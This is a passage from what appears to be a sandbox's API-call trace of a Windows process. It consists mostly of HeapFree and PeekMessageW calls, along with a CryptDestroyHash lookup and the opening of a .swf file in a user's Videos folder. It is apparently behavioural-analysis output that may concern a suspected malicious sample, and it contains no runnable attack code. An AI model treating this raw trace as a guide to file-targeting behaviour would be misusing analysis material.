hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.383] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0096.384] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.384] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0096.384] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0096.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0096.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0096.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0096.386] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0096.386] CryptDestroyHash (hHash=0x41ac540) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0096.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0096.387] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0096.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0096.390] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0096.391] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0096.391] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0096.391] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf" (normalized: "c:\\users\\fd1hvy\\videos\\-frmf8je.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0096.391] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.391] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.391] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0096.392] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0096.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: 